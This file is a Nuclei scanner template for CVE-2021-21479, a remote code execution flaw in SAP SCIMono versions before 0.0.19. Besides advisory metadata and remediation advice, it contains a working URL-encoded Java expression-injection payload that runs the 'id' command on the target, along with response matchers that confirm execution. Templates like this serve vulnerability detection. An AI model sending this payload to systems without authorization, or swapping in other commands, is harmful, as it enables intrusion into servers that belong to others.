nuclei-templates/http/cves/2021/CVE-2021-21479.yaml

46 lines
1.7 KiB
YAML

id: CVE-2021-21479
info:
name: SCIMono <0.0.19 - Remote Code Execution
author: dwisiswant0
severity: critical
description: |
SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and
execute java expressions and compromise the availability and integrity of the system.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
remediation: |
Upgrade SCIMono to version 0.0.19 or later to mitigate this vulnerability.
reference:
- https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
- https://nvd.nist.gov/vuln/detail/CVE-2021-21479
- https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2021-21479
cwe-id: CWE-74
epss-score: 0.00362
epss-percentile: 0.69203
cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sap
product: scimono
tags: cve,cve2021,scimono,rce,sap
http:
- method: GET
path:
- "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"
matchers:
- type: word
part: body
words:
- "The attribute value"
- "java.lang.UNIXProcess@"
- "has invalid value!"
- '"status" : "400"'
condition: and
# digest: 4a0a004730450220106f5c511cfb4e10fddcc98691249d094843d9a6532784093f11f08c907f35c0022100caa4e53c6eee1055640540684783d0a03dfa2f97be4dae8719a599d09decabc5:922c64590222798bb761d5b6d8e72950